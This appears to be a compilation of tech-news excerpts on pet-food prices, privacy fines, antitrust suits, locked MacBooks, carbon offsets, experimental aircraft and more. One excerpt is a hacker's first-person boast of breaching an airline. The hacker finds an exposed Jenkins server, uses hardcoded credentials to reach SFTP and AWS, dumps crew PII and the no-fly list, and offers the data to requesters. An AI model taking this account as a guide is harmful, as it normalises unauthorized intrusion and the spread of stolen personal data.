Customers have been reporting steep price increases across a number of items from Royal Canin – with one saying her food had increased by £15 for a 10kg bag in less than a year.
Zooplus, an online pet food seller that stocks Royal Canin – among other brands – said it did not want to pass these price increases on to its customers, branding them “excessive”, and saying “value for money is important to us”.
The German retailer explained that people may find it difficult to buy Royal Canin products from its site and it has limited the number of items each household can purchase.
Meta’s (META.O) WhatsApp subsidiary was fined 5.5 million euros ($5.95 million) on Thursday by Ireland’s Data Privacy Commissioner (DPC), its lead EU privacy regulator, for an additional breach of the bloc’s privacy laws.
The DPC also told WhatsApp to reassess how it uses personal data for service improvements following a similar order it issued this month to Meta’s other main platforms, Facebook and Instagram, which stated Meta must reassess the legal basis upon which it targets advertising through the use of personal data.
Microsoft wants to know how many out-of-support copies of Office are installed on Windows PCs, and it intends to find out by pushing a patch through Microsoft Update that it swears is safe, not that you asked.
Quietly mentioned in a support post this week, update KB5021751 is targeting versions of Office “including” 2007 and 2010, both of which have been out of service for several years. Office 2013 is also being asked after as it’s due to lose support this coming April.
“This update will run one time silently without installing anything on the user’s device,” Microsoft said, followed by instructions on how to download and install the update, which Microsoft said has been scanned to ensure it’s not infected by malware.
[…]
Microsoft’s description of its out-of-support Office census update leaves much to the imagination, including whether the paragraph describing installation of the update, directly contradicting the paragraph above, is simply misplaced boilerplate language that doesn’t apply to KB5021751.
Also missing is any explanation of how the update will gather info on Office installations, whether it is collecting any other system information or what exactly will be transmitted and stored by Microsoft.
Because the nature of the update is unclear, it’s also unknown what may be left behind after it runs. Microsoft said that it is a single-run, silent process, but left off mention of traces of the update that may be left behind.
Thousands of people who use Norton password manager began receiving emailed notices this month alerting them that an unauthorized party may have gained access to their personal information along with the passwords they have stored in their vaults.
Gen Digital, Norton’s parent company, said the security incident was the result of a credential-stuffing attack rather than an actual breach of the company’s internal systems. Gen’s portfolio of cybersecurity services has a combined user base of 500 million users — of which about 925,000 active and inactive users, including approximately 8,000 password manager users may have been targeted in the attack, a Gen spokesperson told CNET via email.
[…]
Norton’s intrusion detection systems detected an unusual number of failed login attempts on Dec. 12, the company said in its notice. On further investigation, around Dec. 22, Norton was able to determine that the attack began around Dec. 1.
“Norton promptly notified both regulators and customers as soon as the team was able to confirm that data was accessed in the attack,” Gen’s spokesperson said.
Personal data that may have been compromised includes Norton users’ full names, phone numbers and mailing addresses. Norton also said it “cannot rule out” that password manager vault data including users’ usernames and passwords were compromised in the attack.
“Systems have not been compromised, and they are safe and operational, but as is all too commonplace in today’s world, bad actors may take credentials found elsewhere, like the Dark Web, and create automated attacks to gain access to other unrelated accounts,”
The Department of Justice filed a lawsuit against Google Tuesday, accusing the tech giant of using its market power to create a monopoly in the digital advertising business over the course of 15 years.
Google “corrupted legitimate competition in the ad tech industry by engaging in a systematic campaign to seize control of the wide swath of high-tech tools used by publishers, advertisers and brokers, to facilitate digital advertising,” the Justice Department alleges. Eight state attorneys general joined in the suit, filed in Virginia federal court. Google has faced five antitrust suits since 2020.
Secondhand MacBooks that retailed for as much as $3,000 are being turned into parts because recyclers have no way to login and factory reset the machines, which are often just a couple years old.
“How many of you out there would like a 2-year-old M1 MacBook? Well, too bad, because your local recycler just took out all the Activation Locked logic boards and ground them into carcinogenic dust,” John Bumstead, a MacBook refurbisher and owner of the RDKL INC repair store, said in a recent tweet.
The problem is Apple’s T2 security chip. First introduced in 2018, the laptop makes it impossible for anyone who isn’t the original owner to log into the machine. It’s a boon for security and privacy and a plague on the second hard market. “Like it has been for years with recyclers and millions of iPhones and iPads, it’s pretty much game over with MacBooks now—there’s just nothing to do about it if a device is locked,” Bumstead told Motherboard. “Even the jailbreakers/bypassers don’t have a solution, and they probably won’t because Apple proprietary chips are so relatively formidable.” When Apple released its own silicon with the M1, it integrated the features of the T2 into those computers.
[…]
Bumstead told Motherboard that every year Apple makes life a little harder for the second hand market. “The progression has been, first you had certifications with unrealistic data destruction requirements, and that caused recyclers to pull drives from machines and sell without drives, but then as of 2016 the drives were embedded in the boards, so they started pulling boards instead,” he said. “And now the boards are locked, so they are essentially worthless. You can’t even boot locked 2018+ MacBooks to an external device because by default the MacBook security app disables external booting.”
Motherboard first reported on this problem in 2020, but Bumstead said it’s gotten worse recently. “Now we’re seeing quantity come through because companies with internal 3-year product cycles are starting to dump their 2018/2019s, and inevitably a lot of those are locked,” he said.
[…]
Bumstead offered some solutions to the problem. “When we come upon a locked machine that was legally acquired, we should be able to log into our Apple account, enter the serial and any given information, then click a button and submit the machine to Apple for unlocking,” he said. “Then Apple could explore its records, query the original owner if it wants, but then at the end of the day if there are no red flags and the original owner does not protest within 30 days, the device should be auto-unlocked.”
Android users in India will soon have more control over their devices, thanks to a court ruling. Beginning next month, Indian Android wielders can choose a different billing system when paying for apps and in-app smartphone purchases rather than default to going through the Play Store. Google will also allow Indian users to select a different search engine as their default right as they set up a new device, which might have implications for upcoming EU regulations.
The move comes after a ruling last week by India’s Supreme Court. The trial started late last year when the Competition Commission of India (CCI) fined Google $161 million for imposing restrictions on its manufacturing partners. Google attempted to challenge the order by maintaining this kind of practice would stall the Android ecosystem and that “no other jurisdiction has ever asked for such far-reaching changes.”
[…]
Google also won’t be able to require the installation of its branded apps to grant the license for running Android OS anymore. From now on, device manufacturers in India will be able to license “individual Google apps” as they like for pre-installation rather than needing to bundle the whole kit and caboodle. Google is also updating the Android compatibility requirements for its OEM partners to “build non-compatible or forked variants.”
[…]
Of particular note is seeing how users will react to being able to choose whether to buy apps and other in-app purchases through the Play Store, where Google takes a 30% cut from each transaction, or through an alternative billing service like JIO Money or Paytm—or even Amazon Pay, available in India.
[…]
The Department of Justice in the United States is also suing Google’s parent company, Alphabet, for a second time this week for practices within its digital advertising business, alleging that the company “corrupted legitimate competition in the ad tech industry” to build out its monopoly.
note: this is a slightly more technical* and comedic write up of the story covered by my friends over at dailydot, which you can read here
*i say slightly since there isnt a whole lot of complicated technical stuff going on here in the first place
step 1: boredom
like so many other of my hacks this story starts with me being bored and browsing shodan (or well, technically zoomeye, chinese shodan), looking for exposed jenkins servers that may contain some interesting goods. at this point i’ve probably clicked through about 20 boring exposed servers with very little of any interest, when i suddenly start seeing some familar words. “ACARS“, lots of mentions of “crew” and so on. lots of words i’ve heard before, most likely while binge watching Mentour Pilot YouTube videos. jackpot. an exposed jenkins server belonging to CommuteAir.
step 2: how much access do we have really?
ok but let’s not get too excited too quickly. just because we have found a funky jenkins server doesn’t mean we’ll have access to much more than build logs. it quickly turns out that while we don’t have anonymous admin access (yes that’s quite frequently the case [god i love jenkins]), we do have access to build workspaces. this means we get to see the repositories that were built for each one of the ~70 build jobs.
step 3: let’s dig in
most of the projects here seem to be fairly small spring boot projects. the standardized project layout and extensive use of the resources directory for configuration files will be very useful in this whole endeavour.
the very first project i decide to look at in more detail is something about “ACARS incoming”, since ive heard the term acars before, and it sounds spicy. a quick look at the resource directory reveals a file called application-prod.properties (same also for -dev and -uat). it couldn’t just be that easy now, could it?
well, it sure is! two minutes after finding said file im staring at filezilla connected to a navtech sftp server filled with incoming and outgoing ACARS messages. this aviation shit really do get serious.
here is a sample of a departure ACARS message:
from here on i started trying to find journalists interested in a probably pretty broad breach of US aviation. which unfortunately got peoples hopes up in thinking i was behind the TSA problems and groundings a day earlier, but unfortunately im not quite that cool. so while i was waiting for someone to respond to my call for journalists i just kept digging, and oh the things i found.
as i kept looking at more and more config files in more and more of the projects, it dawned on me just how heavily i had already owned them within just half an hour or so. hardcoded credentials there would allow me access to navblue apis for refueling, cancelling and updating flights, swapping out crew members and so on (assuming i was willing to ever interact with a SOAP api in my life which i sure as hell am not).
i however kept looking back at the two projects named noflycomparison and noflycomparisonv2, which seemingly take the TSA nofly list and check if any of commuteair’s crew members have ended up there. there are hardcoded credentials and s3 bucket names, however i just cant find the actual list itself anywhere. probably partially because it seemingly always gets deleted immediately after processing it, most likely specifically because of nosy kittens like me.
fast forward a few hours and im now talking to Mikael Thalen, a staff writer at dailydot. i give him a quick rundown of what i have found so far and how in the meantime, just half an hour before we started talking, i have ended up finding AWS credentials. i now seemingly have access to pretty much their entire aws infrastructure via aws-cli. numerous s3 buckets, dozens of dynamodb tables, as well as various servers and much more. commute really loves aws.
i also share with him how close we seemingly are to actually finding the TSA nofly list, which would obviously immediately make this an even bigger story than if it were “only” a super trivially ownable airline. i had even peeked at the nofly s3 bucket at this point which was seemingly empty. so we took one last look at the noflycomparison repositories to see if there is anything in there, and for the first time actually take a peek at the test data in the repository. and there it is. three csv files, employee_information.csv, NOFLY.CSV and SELECTEE.CSV. all commited to the repository in july 2022. the nofly csv is almost 80mb in size and contains over 1.56 million rows of data. this HAS to be the real deal (we later get confirmation that it is indeed a copy of the nofly list from 2019).
holy shit, we actually have the nofly list. holy fucking bingle. what?! :3
with the jackpot found and being looked into by my journalism friends i decided to dig a little further into aws. grabbing sample documents from various s3 buckets, going through flight plans and dumping some dynamodb tables. at this point i had found pretty much all PII imaginable for each of their crew members. full names, addresses, phone numbers, passport numbers, pilot’s license numbers, when their next linecheck is due and much more. i had trip sheets for every flight, the potential to access every flight plan ever, a whole bunch of image attachments to bookings for reimbursement flights containing yet again more PII, airplane maintenance data, you name it.
i had owned them completely in less than a day, with pretty much no skill required besides the patience to sift through hundreds of shodan/zoomeye results.
so what happens next with the nofly data
while the nature of this information is sensitive, i believe it is in the public interest for this list to be made available to journalists and human rights organizations. if you are a journalist, researcher, or other party with legitimate interest, please reach out at nofly@crimew.gay. i will only give this data to parties that i believe will do the right thing with it.
note: if you email me there and i do not reply within a regular timeframe it is very likely my reply ended up in your spam folder or got lost. using email not hosted by google or msft is hell. feel free to dm me on twitter in that case.
support me
if you liked this or any of my other security research feel free to support me on my ko-fi. i am unemployed and in a rather precarious financial situation and do this research for free and for the fun of it, so anything goes a long way.
Your international money transfers might not be as discreet as you think. Senator Ron Wyden and The Wall Street Journal have learned that US law enforcement can access details of money transfers without a warrant through an obscure surveillance program the Arizona attorney general’s office created in 2014. A database stored at a nonprofit, the Transaction Record Analysis Center (TRAC), provides full names and amounts for larger transfers (above $500) sent between the US, Mexico and 22 other regions through services like Western Union, MoneyGram and Viamericas. The program covers data for numerous Caribbean and Latin American countries in addition to Canada, China, France, Malaysia, Spain, Thailand, Ukraine and the US Virgin Islands. Some domestic transfers also enter the data set.
[…]
The concern, of course, is that officials can obtain sensitive transaction details without court oversight or customers’ knowledge. An unscrupulous officer could secretly track large transfers. Wyden adds that the people in the database are more likely to be immigrants, minorities and low-income residents who don’t have bank accounts and already have fewer privacy protectoins. The American Civil Liberties Union also asserts that the subpoenas used to obtain this data violate federal law. Arizona issued at least 140 of these subpoenas between 2014 and 2021.
[…]In a study published Monday in the journal Biosensor and Bioelectronics, a group of researchers from Tel Aviv University (via Neuroscience News) said they recently created a robot that can identify a handful of smells with 10,000 times more sensitivity than some specialized electronics. They describe their robot as a bio-hybrid platform (read: cyborg). It features a set of antennae taken from a desert locust that is connected to an electronic system that measures the amount of electrical signal produced by the antennae when they detect a smell. They paired the robot with an algorithm that learned to characterize the smells by their signal output. In this way, the team created a system that could reliably differentiate between eight “pure” odors, including geranium, lemon and marzipan, and two mixtures of different smells. The scientists say their robot could one day be used to detect drugs and explosives.
A YouTube video from Tel Aviv University claims the robot is a “scientific first,” but last June researchers from Michigan State University published research detailing a system that used surgically-altered locusts to detect cancer cells. Back in 2016, scientists also tried turning locusts into bomb-sniffing cyborgs. What can I say, after millennia of causing crop failures, the pests could finally be useful for something.
[…]The research team working with Airbus at the University of Surrey’s Advanced Technology Institute claims its nano-coating, referred to as a Multifunctional Nanobarrier Structure (MFNS), can be applied to the surfaces of equipment, including antennas, and it has been shown to be able to reduce the operating temperature of such surfaces from 120°C to 60°C (248°F to 140°F).
In its study published online, the team explains that thermal control is essential for most spaceborne equipment as heating from sunlight can cause large temperature differences across satellites that would result in mechanical stresses and possible misalignment of scientific instruments such as optical components. Paradoxically, space systems also require heat pipes to ensure minimal heating so that payloads can withstand the coldest space conditions.
[…]
The solution the team developed is a multilayer protection nanobarrier, which it says is comprised of a buffer layer made of poly(p-xylylene) and a diamond-like carbon superlattice layer that gives it a mechanically and environmentally ultra-stable platform.
The MFNS is deposited onto surfaces using a custom plasma-enhanced chemical vapor deposition (PECVD) system, which operates at room temperature and so can be applied to heat-sensitive substrates.
The combined layer is a dielectric and therefore electromagnetically transparent across a wide range of radio frequencies, the study states, allowing it to be used to coat antenna structures without adding “significant interference” to the signal.
[…]
According to the team, the MFNS can be modulated to provide adjustable solar absorptivity in the ultraviolet to visible part of the spectrum, while at the same time exhibiting high and stable infrared emissivity. This is achieved by controlling the optical gap of individual layers.
This extends to self-reconfiguration in orbit, if the report can be believed, by means of balancing the UV and atomic oxygen (AO) exposure of the MFNS coating. AO is created from molecular oxygen in the upper atmosphere by UV radiation, forming AO radicals commonly found in low Earth orbit, the research adds.
As to the harvesting of heat energy, this can be achieved through the creation of highly absorbing structures with a photothermal conversion efficiency as high as 96.66 percent, according to the team. This is aided by the deposition of a nitrogen-doped DLC superlattice layer in the coating which gives rise to enhanced optical absorption across a wide spectral range.
These enhanced properties, along with advanced manufacturing methods, demonstrate that the MFNS can be a candidate for many thermal applications such as photodetectors, emitters, smart radiators, and energy harvesting used in satellite systems and beyond, the study states.
Chemical flame retardants can make us safer by preventing or slowing fires, but they’re linked to a range of unsettling health effects. To get around that concern, researchers with the U.S. Department of Agriculture have bred a new population of cotton that can self-extinguish after encountering a flame.
The team of scientists from the USDA’s Agricultural Research Service, led by Gregory N. Thyssen, bred 10 strains of cotton using alleles from 10 different parent cultivars. After creating fabrics with each of these strains, the researchers put them through burn tests and found that four of them were able to completely self-extinguish. Their work is published today in PLOS One.
[…]
These flame retardant cultivars could be a game-changer in the textile industry. Currently, efforts to make fabric flame retardant include applying chemicals that reduce a material’s ability to ignite; flame retardant chemicals have been added to many fabrics since at least the 1970s. While some have been pulled from the market, these chemicals don’t break down easily, and they can bioaccumulate in humans and animals, potentially leading to endocrine disruption, reproductive toxicity, and cancer. These new strains of cotton could be used to manufacture fabrics and products that have flame retardancy naturally baked in.
The forest carbon offsets approved by the world’s leading provider and used by Disney, Shell, Gucci and other big corporations are largely worthless and could make global heating worse, according to a new investigation.
The research into Verra, the world’s leading carbon standard for the rapidly growing $2bn (£1.6bn) voluntary offsets market, has found that, based on analysis of a significant percentage of the projects, more than 90% of their rainforest offset credits – among the most commonly used by companies – are likely to be “phantom credits” and do not represent genuine carbon reductions.
The analysis raises questions over the credits bought by a number of internationally renowned companies – some of them have labelled their products “carbon neutral”, or have told their consumers they can fly, buy new clothes or eat certain foods without making the climate crisis worse.
But doubts have been raised repeatedly over whether they are really effective.
The nine-month investigation has been undertaken by the Guardian, the German weekly Die Zeit and SourceMaterial, a non-profit investigative journalism organisation. It is based on new analysis of scientific studies of Verra’s rainforest schemes.
[…]
Verra argues that the conclusions reached by the studies are incorrect, and questions their methodology. And they point out that their work since 2009 has allowed billions of dollars to be channelled to the vital work of preserving forests.
The investigation found that:
Only a handful of Verra’s rainforest projects showed evidence of deforestation reductions, according to two studies, with further analysis indicating that 94% of the credits had no benefit to the climate.
The threat to forests had been overstated by about 400% on average for Verra projects, according to analysis of a 2022 University of Cambridge study.
Gucci, Salesforce, BHP, Shell, easyJet, Leon and the band Pearl Jam were among dozens of companies and organisations that have bought rainforest offsets approved by Verra for environmental claims.
Human rights issues are a serious concern in at least one of the offsetting projects. The Guardian visited a flagship project in Peru, and was shown videos that residents said showed their homes being cut down with chainsaws and ropes by park guards and police. They spoke of forced evictions and tensions with park authorities.
[…]
Two different groups of scientists – one internationally based, the other from Cambridge in the UK – looked at a total of about two-thirds of 87 Verra-approved active projects. A number were left out by the researchers when they felt there was not enough information available to fairly assess them.
The two studies from the international group of researchers found just eight out of 29 Verra-approved projects where further analysis was possible showed evidence of meaningful deforestation reductions.
The journalists were able to do further analysis on those projects, comparing the estimates made by the offsetting projects with the results obtained by the scientists. The analysis indicated about 94% of the credits the projects produced should not have been approved.
Credits from 21 projects had no climate benefit, seven had between 98% and 52% fewer than claimed using Verra’s system, and one had 80% more impact, the investigation found.
Separately, the study by the University of Cambridge team of 40 Verra projects found that while a number had stopped some deforestation, the areas were extremely small. Just four projects were responsible for three-quarters of the total forest that was protected.
The journalists again analysed these results more closely and found that, in 32 projects where it was possible to compare Verra’s claims with the study finding, baseline scenarios of forest loss appeared to be overstated by about 400%. Three projects in Madagascar have achieved excellent results and have a significant impact on the figures. If those projects are not included, the average inflation is about 950%.
[…]
Barbara Haya, the director of the Berkeley Carbon Trading Project, has been researching carbon credits for 20 years, hoping to find a way to make the system function. She said: “The implications of this analysis are huge. Companies are using credits to make claims of reducing emissions when most of these credits don’t represent emissions reductions at all.
“Rainforest protection credits are the most common type on the market at the moment. And it’s exploding, so these findings really matter. But these problems are not just limited to this credit type. These problems exist with nearly every kind of credit.
“One strategy to improve the market is to show what the problems are and really force the registries to tighten up their rules so that the market could be trusted. But I’m starting to give up on that. I started studying carbon offsets 20 years ago studying problems with protocols and programs. Here I am, 20 years later having the same conversation. We need an alternative process. The offset market is broken.”
The Defense Advanced Research Projects Agency has moved into the next phase of its Control of Revolutionary Aircraft with Novel Effectors program, or CRANE. The project is centered on an experimental uncrewed aircraft, which Aurora Flight Sciences is developing, that does not have traditional moving surfaces to control the aircraft in flight.
Aurora Flight Sciences’ CRANE design, which does not yet have an official X-plane designation or nickname, instead uses an active flow control (AFC) system to maneuver the aircraft using bursts of highly pressurized air. This technology could eventually find its way onto other military and civilian designs. It could have particularly significant implications when applied to future stealth aircraft.
A subscale wind tunnel model of Aurora Flight Sciences’ CRANE X-plane design. Aurora Flight Sciences
The Defense Advanced Research Projects Agency (DARPA) issued a press release regarding the last developments in the CRANE program yesterday. Aurora Flight Sciences, a subsidiary of Boeing, announced it had received a Phase 2 contract to continue work on this project back on December 12, 2022.
[…]
The design that Aurora ultimately settled on was more along the lines of a conventional plane. However, it has a so-called Co-Planar Joined Wing (CJW) planform consisting of two sets of wings attached to a single center fuselage that merge together at the tips, along with a twin vertical tail arrangement. As currently designed, the drone will use “banks” of nozzles installed at various points on the wings to maneuver in the air.
A wind tunnel model of one of Aurora Flight Sciences’ initial CRANE concepts with a joined wing. Aurora Flight Sciences
A wind tunnel model showing a more recent evolution of Aurora Flight Sciences’ CRANE X-plane design. Aurora Flight Sciences
The aircraft’s main engine arrangement is not entirely clear. An chin air intake under the forward fuselage together with a single exhaust nozzle at the rear seen in official concept art and on wind tunnel models would seem to point to a plan to power the aircraft with a single jet engine.
[…]
Interestingly, Aurora’s design “is configured to be a modular testbed featuring replaceable outboard wings and swappable AFC effectors. The modular design allows for testing of not only Aurora’s AFC effectors but also AFC effectors of various other designs,” a company press release issued in December 2022 said. “By expanding testing capabilities beyond Aurora-designed components, the program further advances its goal to provide the confidence needed for future aircraft requirements, both military and commercial, to include AFC-enabled capabilities.”
Aurora has already done significant wind tunnel testing of subscale models with representative AFC components as part of CRANE’s Phase 1. The company, along with Lockheed Martin, was chosen to proceed to that phase of the program in 2021.
“Using a 25% scale model, Aurora conducted tests over four weeks at a wind tunnel facility in San Diego, California. In addition to 11 movable conventional control surfaces, the model featured 14 AFC banks with eight fully independent controllable AFC air supply channels,” according to a press release the company put out in May 2022.
[…]
Getting rid of traditional control surfaces inherently allows for a design to be more aerodynamic, and therefore fly in a more efficient manner, especially at higher altitudes. An aircraft with an AFC system doesn’t need the various actuators and other components to move things like ailerons and rudders, offering new ways to reduce weight and bulk.
A DARPA briefing slide showing how the designs of traditional control surfaces, at their core, have remained largely unchanged after more than a century of other aviation technology developments. DARPA
A lighter and more streamlined aircraft design using an AFC system might be capable of greater maneuverability. This could be particularly true for uncrewed types that also do not have to worry about the physical limitations of a pilot.
The elimination of so many moving parts also means fewer things that can break, improving safety and reliability. This would do away with various maintenance and logistics requirements, too. It might make a military design more resilient to battle damage and easier to fix, as well.
[…]
The CRANE program and Aurora Flight Sciences’ design is of course not the first time AFC technology has been experimented with. U.K.-headquartered BAE Systems, which was another one of the participants in CRANE’s Phase 0, has been very publicly experimenting with various AFC concepts since at least 2010. The most recent of these developments was an AFC-equipped design called MAGMA. Described by BAE as a “large model,” this aircraft actually flew and you can read more about it here.
“Over the past several decades, the active flow control community has made significant advancements that enable the integration of active flow control technologies into advanced aircraft,” Richard Wlezein, the CRANE Program Manager at DARPA, said in a statement included in today’s press release. “We are confident about completing the design and flight test of a demonstration aircraft with AFC as the primary design consideration.”
Ammaar Reshi wrote and illustrated a children’s book in 72 hours using ChatGPT and Midjourney.
The book went viral on Twitter after it was met with intense backlash from artists.
Reshi said he respected the artists’ concerns but felt some of the anger was misdirected.
Ammaar Reshi was reading a bedtime story to his friend’s daughter when he decided he wanted to write his own.
Reshi, a product-design manager at a financial-tech company based in San Francisco, told Insider he had little experience in illustration or creative writing, so he turned to AI tools.
In December he used OpenAI’s new chatbot, ChatGPT, to write “Alice and Sparkle,” a story about a girl named Alice who wants to learn about the world of tech, and her robot friend, Sparkle. He then used Midjourney, an AI art generator, to illustrate it.
Just 72 hours later, Reshi self-published his book on Amazon’s digital bookstore. The following day, he had the paperback in his hands, made for free via another Amazon service called KDP.
“Alice and Sparkle” was meant to be a gift for his friends’ kids.Ammaar Reshi
He said he paid nothing to create and publish the book, though he was already paying for a $30-a-month Midjourney subscription.
Impressed with the speed and results of his project, Reshi shared the experience in a Twitter thread that attracted more than 2,000 comments and 5,800 retweets.
Reshi said he initially received positive feedback from users praising his creativity. But the next day, the responses were filled with vitriol.
“There was this incredibly passionate response,” Reshi said. “At 4 a.m. I was getting woken up by my phone blowing up every two minutes with a new tweet saying things like, ‘You’re scum’ and ‘We hate you.'”
Reshi said he was shocked by the intensity of the responses for what was supposed to be a gift for the children of some friends. It was only when he started reading through them that he discovered he had landed himself in the middle of a much larger debate.
Artists accused him of theft
Reshi’s book touched a nerve with some artists who argue that AI art generators are stealing their work.
Some artists claim their art has been used to train AI image generators like Midjourney without their permission. Users can enter artists’ names as prompts to generate art in their style.
An update to Lensa AI, a photo-editing tool, went viral on social-media last year after it launched an update that used AI to transform users’ selfies into works of art, leading artists to highlight their concerns about AI programs taking inspiration from their work without permission or payment.
“I had not read up on the issues,” Reshi said. “I realized that Lensa had actually caused this whole thing with that being a very mainstream app. It had spread that debate, and I was just getting a ton of hate for it.”
“I was just shocked, and honestly I didn’t really know how to deal with it,” he said.
Among the nasty messages, Reshi said he found people with reasonable and valid concerns.
“Those are the people I wanted to engage with,” he said. “I wanted a different perspective. I think it’s very easy to be caught up in your bubble in San Francisco and Silicon Valley, where you think this is making leaps, but I wanted to hear from people who thought otherwise.”
After learning more, he added to his Twitter thread saying that artists should be involved in the creation of AI image generators and that their “talent, skill, hard work to get there needs to be respected.”
He said he thinks some of the hate was misdirected at his one-off project, when Midjourney allows users to “generate as much art as they want.”
Reshi’s book was briefly removed from Amazon — he said Amazon paused its sales from January 6 to January 14, citing “suspicious review activity,” which he attributed to the volume of both five- and one-star reviews. He had sold 841 copies before it was removed.
Midjourney’s founder, David Holz, told Insider: “Very few images made on our service are used commercially. It’s almost entirely for personal use.”
He said that data for all AI systems are “sourced from broadly spidering the internet,” and most of the data in Midjourney’s model are “just photos.”
A creative process
Reshi said the project was never about claiming authorship over the book.
“I wouldn’t even call myself the author,” he said. “The AI is essentially the ghostwriter, and the other AI is the illustrator.”
But he did think the process was a creative one. He said he spent hours tweaking the prompts in Midjourney to try and achieve consistent illustrations.
Despite successfully creating an image of his heroine, Alice, to appear throughout the book, he wasn’t able to do the same for her robot friend. He had to use a picture of a different robot each time it appeared.
“It was impossible to get Sparkle the robot to look the same,” he said. “It got to a point where I had to include a line in the book that says Sparkle can turn into all kinds of robot shapes.”
Reshi’s children’s book stirred up anger on Twitter.Ammaar Reshi
Some people also attacked the quality of the book’s writing and illustrations.
“The writing is stiff and has no voice whatsoever,” one Amazon reviewer said. “And the art — wow — so bad it hurts. Tangents all over the place, strange fingers on every page, and inconsistencies to the point where it feels like these images are barely a step above random.”
Reshi said he would be hesitant to put out an illustrated book again, but he would like to try other projects with AI.
“I’d use ChatGPT for instance,” he said, saying there seem to be fewer concerns around content ownership than with AI image generators.
The goal of the project was always to gift the book to the two children of his friends, who both liked it, Reshi added.
“It worked with the people I intended, which was great,” he said.
European researchers have successfully tested a system that uses terawatt-level laser pulses to steer lighting toward a 26-foot rod. It’s not limited by its physical height, and can cover much wider areas — in this case, 590 feet — while penetrating clouds and fog.
The design ionizes nitrogen and oxygen molecules, releasing electrons and creating a plasma that conducts electricity. As the laser fires at a very quick 1,000 pulses per second, it’s considerably more likely to intercept lightning as it forms. In the test, conducted between June and September 2021, lightning followed the beam for nearly 197 feet before hitting the rod.
[…]
The University of Glasgow’s Matteo Clerici, who didn’t work on the project, noted to The Journal that the laser in the experiment costs about $2.17 billion dollars. The discoverers also plan to significantly extend the range, to the point where a 33-foot rod would have an effective coverage of 1,640 feet.
[…] Nanosys, a company whose quantum dot technology is in millions of TVs, offered to show me a top-secret prototype of a next-generation display. Not just any next-gen display, but one I’ve been writing about for years and which has the potential to dethrone OLED as the king of displays.
[…]
Electroluminescent quantum dots. These are even more advanced than the quantum dots found in the TVs of today. They could possibly replace LCD and OLED for phones and TVs. They have the potential of improved picture quality, energy savings and manufacturing efficiency. A simpler structure makes these displays theoretically so easy to produce, they could usher in a sci-fi world of inexpensive screens on everything from eyeglasses to windscreens and windows.
[…]
Quantum dots are tiny particles that when supplied with energy emit specific wavelengths of light. Different size quantum dots emit different wavelengths. Or to put it another way, some dots emit red light, others green, and others still, blue.
[…]
For the last few years, quantum dots have been used by TV manufacturers to boost the brightness and color of LCD TVs. The “Q” in QLED TV stands for “quantum.”
The quantum dots used in display tech up to this point are what’s called “photoluminescent.” They absorb light, then emit light.
[…]
The prototype I saw was completely different. No traditional LEDs and no OLED. Instead of using light to excite quantum dots into emitting light, it uses electricity. Nothing but quantum dots. Electroluminescent, aka direct-view, quantum dots.
[…]
Theoretically, this will mean thinner, more energy-efficient displays. It means displays that can be easier, as in cheaper, to manufacture.
[…]
Nanosys calls this direct-view, electroluminescent quantum dot tech “nanoLED”
[…]
Having what amounts to a simpler display structure, you can incorporate QD-based displays in a wider variety of situations. Or more specifically, on a wider variety of surfaces. Essentially, you can print an entire QD display onto a surface without the heat required by other “printable” tech.
What does this mean? Just about any flat or curved surface could be a screen
[…]
For instance, you could incorporate a screen onto the windshield of a car for a more elaborate, high-resolution, easy-to-see, heads-up display. Speed and navigation directions for sure, but how about augmented reality for safer nighttime driving with QD-display-enhanced lane markers and street signs?
[…]
AR glasses have been a thing, but they’re bulky, low resolution and, to be perfectly honest, lame. A QD display could be printed on the lenses themselves, requiring less elaborate electronics in the frames.
[…]
I think an obvious early use, despite how annoying it could be, would be bus or subway windows. These will initially be pitched by cities as a way to show people important info, but inevitably they’ll be used for advertising. That’s certainly not a knock against the tech, just how things work in the world.
[…]
5-10 years from now we’ll almost certainly have options for QD displays in our phones, probably in our living rooms, and possibly on our windshields and windows
Contrails — the wispy ice clouds trailing behind flying jets — “are surprisingly bad for the environment,” reports CNN: A study that looked at aviation’s contribution to climate change between 2000 and 2018 concluded that contrails create 57% of the sector’s warming impact, significantly more than the CO2 emissions from burning fuel. They do so by trapping heat that would otherwise be released into space.
And yet, the problem may have an apparently straightforward solution. Contrails — short for condensation trails, which form when water vapor condenses into ice crystals around the small particles emitted by jet engines — require cold and humid atmospheric conditions, and don’t always stay around for long. Researchers say that by targeting specific flights that have a high chance of producing contrails, and varying their flight path ever so slightly, much of the damage could be prevented.
Adam Durant, a volcanologist and entrepreneur based in the UK, is aiming to do just that. “We could, in theory, solve this problem for aviation within one or two years,” he says…. Of contrails’ climate impact, “80 or 90% is coming from only maybe five to 10% of all flights,” says Durant. “Simply redirecting a small proportion of flights can actually save the majority of the contrail climate impact….”
In 2021, scientists calculated that addressing the contrail problem would cost under $1 billion a year, but provide benefits worth more than 1,000 times as much. And a study from Imperial College London showed that diverting just 1.7% of flights could reduce the climate damage of contrails by as much as 59%.
Durant’s company Satavia is now testing its technology with two airlines and “actively looking for more airlines in 2023 to work with, as we start scaling up the service that we offer.”
Truly addressing the issue may require some changes to air traffic rules, Durant says — but he’s not the only one working on the issue. There’s also the task force of a non-profit energy think tank that includes six airlines, plus researchers and academics. “We could seriously reduce, say, 50% of the industry’s contrails impact by 2030,” Durant tells CNN. “That’s totally attainable, because we can do it with software and analytics.”
Meta has filed a lawsuit against Voyager Labs, which it has accused of creating tens of thousands of fake accounts to scrape data from more than 600,000 Facebook users’ profiles. It says the surveillance company pulled information such as posts, likes, friend lists, photos, and comments, along with other details from groups and pages. Meta claims that Voyager masked its activity using its Surveillance Software, and that the company has also scraped data from Instagram, Twitter, YouTube, LinkedIn and Telegram to sell and license for profit.
In the complaint, which was obtained by Gizmodo, Meta has asked a judge to permanently ban Voyager from Facebook and Instagram. “As a direct result of Defendant’s unlawful actions, Meta has suffered and continues to suffer irreparable harm for which there is no adequate remedy at law, and which will continue unless Defendant’s actions are enjoined,” the filing reads. Meta said Voyager’s actions have caused it “to incur damages, including investigative costs, in an amount to be proven at trial.”
Meta claims that Voyager scraped data from accounts belonging to “employees of non-profit organizations, universities, news media organizations, healthcare facilities, the armed forces of the United States, and local, state, and federal government agencies, as well as full-time parents, retirees, and union members.” The company noted in a blog post it disabled accounts linked to Voyager and that filed the suit to enforce its terms and policies.
[…]
In 2021, The Guardian reported that the Los Angeles Police Department had tested Voyager’s social media surveillance tools in 2019. The company is said to have told the department that police could use the software to track the accounts of a suspect’s friends on social media, and that the system could predict crimes before they took place by making assumptions about a person’s activity.
